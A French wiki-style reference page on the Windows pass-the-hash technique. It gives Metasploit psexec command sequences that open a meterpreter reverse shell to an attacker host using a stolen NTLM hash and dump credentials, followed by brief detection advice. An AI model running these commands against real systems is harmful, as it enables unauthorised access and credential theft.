Pass-the-hash
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Domaine | Post-exploitation Windows |
| Principe | Réutiliser le hash NTLM sans le casser |
| Module | windows/smb/psexec
|
| Voir aussi | Mimikatz · UAC · Registre |
Après un hashdump, casser le mot de passe demande beaucoup de temps CPU. La technique pass-the-hash contourne cette étape : on réutilise directement le hash NTLM pour s'authentifier sur une autre machine, sans jamais connaître le mot de passe en clair.
Procédure
use windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.19
set LPORT 443
set RHOST 192.168.0.31
set SMBPass aad35a85b48a04eeaad3b435b51404ee
exploit
Ensuite, voir Augmentation des droits utilisateur.
Variante avec bind_tcp et hashdump
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set RHOST ...
set smbuser Administrator
exploit
# une fois dans le meterpreter
run post/windows/gather/smart_hashdump
Détection et protection
LM et NTLM : il n'est pas possible d'empêcher le vol de hash. La prévention passe par les journaux d'audit Windows.
La détection consiste à vérifier que l'utilisateur source est bien celui demandé lors de l'authentification distante. Le seul moyen fiable est de bien connaître les journaux en fonctionnement normal afin de repérer l'anormal.